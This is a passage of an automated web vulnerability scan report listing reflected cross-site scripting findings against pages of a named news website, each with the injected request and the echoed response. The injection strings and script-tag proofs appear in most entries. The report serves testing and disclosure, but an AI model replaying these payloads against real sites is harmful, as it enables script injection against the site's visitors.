Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Sun, 21 Nov 2010 20:08:35 GMT
Date: Sun, 21 Nov 2010 19:58:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?f56a1"><script>alert(1)</script>4b74896c38=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.74. http://www.wired.com/culture/art/multimedia/2008/07/gallery_faves_food [slideView parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_faves_food

Issue detail

The value of the slideView request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cbdd"><script>alert(1)</script>6a2fa36c36 was submitted in the slideView parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40168


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_faves_food?slide=7&slideView=18cbdd"><script>alert(1)</script>6a2fa36c36', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.75. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb54d"><a>c56f61c551c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturebb54d"><a>c56f61c551c/art/multimedia/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturebb54d"><a>c56f61c551c ss_art c_multimedia">
...[SNIP]...

1.76. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7c4c"><a>89e1688aab6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/artc7c4c"><a>89e1688aab6/multimedia/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:17 GMT
Date: Sun, 21 Nov 2010 23:07:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_artc7c4c"><a>89e1688aab6 c_multimedia">
...[SNIP]...

1.77. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d71fa"><a>b579a399708 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimediad71fa"><a>b579a399708/2008/07/gallery_top_10_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29303
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:33 GMT
Date: Sun, 21 Nov 2010 23:07:33 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimediad71fa"><a>b579a399708">
...[SNIP]...

1.78. http://www.wired.com/culture/art/multimedia/2008/07/gallery_top_10_food [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/07/gallery_top_10_food

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8377"><script>alert(1)</script>a852d762798 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:56 GMT
Date: Sun, 21 Nov 2010 23:06:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 41077


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/07/gallery_top_10_food?c8377"><script>alert(1)</script>a852d762798=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.79. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc57e"><a>6479810cedb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturefc57e"><a>6479810cedb/art/multimedia/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturefc57e"><a>6479810cedb ss_art c_multimedia">
...[SNIP]...

1.80. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287df"><a>b9badeee24d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art287df"><a>b9badeee24d/multimedia/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:43 GMT
Date: Sun, 21 Nov 2010 23:06:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art287df"><a>b9badeee24d c_multimedia">
...[SNIP]...

1.81. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5771a"><a>9832fc9791e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/multimedia5771a"><a>9832fc9791e/2008/10/gallery_trains HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:58 GMT
Date: Sun, 21 Nov 2010 23:06:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_multimedia5771a"><a>9832fc9791e">
...[SNIP]...

1.82. http://www.wired.com/culture/art/multimedia/2008/10/gallery_trains [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /culture/art/multimedia/2008/10/gallery_trains

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d54b5"><script>alert(1)</script>ea506289b5c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 42193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xht
...[SNIP]...
<a href="javascript: void(window.open('/print/culture/art/multimedia/2008/10/gallery_trains?d54b5"><script>alert(1)</script>ea506289b5c=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow">
...[SNIP]...

1.83. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1308"><a>62b113b6ddc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturec1308"><a>62b113b6ddc/art/news/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:15 GMT
Date: Sun, 21 Nov 2010 23:07:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturec1308"><a>62b113b6ddc ss_art c_news">
...[SNIP]...

1.84. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33b07"><a>51bc0c4125e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art33b07"><a>51bc0c4125e/news/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:37 GMT
Date: Sun, 21 Nov 2010 23:07:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art33b07"><a>51bc0c4125e c_news">
...[SNIP]...

1.85. http://www.wired.com/culture/art/news/2008/06/submissions_food [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/news/2008/06/submissions_food

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8ea3"><a>733ee83aeca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/newsb8ea3"><a>733ee83aeca/2008/06/submissions_food HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29288
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:17:49 GMT
Date: Sun, 21 Nov 2010 23:07:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art c_newsb8ea3"><a>733ee83aeca">
...[SNIP]...

1.86. http://www.wired.com/culture/culturereviews [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/culturereviews

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b187a"><a>710ea181819 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cultureb187a"><a>710ea181819/culturereviews HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29273
Vary: Accept-Encoding
Cache-Control: max-age=227
Expires: Sun, 21 Nov 2010 23:09:50 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cultureb187a"><a>710ea181819 ss_culturereviews">
...[SNIP]...

1.87. http://www.wired.com/culture/culturereviews [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/culturereviews

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c101a"><a>c9bdd73e8c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/culturereviewsc101a"><a>c9bdd73e8c4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29273
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:27 GMT
Date: Sun, 21 Nov 2010 23:06:27 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_culturereviewsc101a"><a>c9bdd73e8c4">
...[SNIP]...

1.88. http://www.wired.com/culture/design [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/design

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3632"><a>7fc96fc4812 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee3632"><a>7fc96fc4812/design HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29257
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:03 GMT
Date: Sun, 21 Nov 2010 23:06:03 GMT
Connection: close


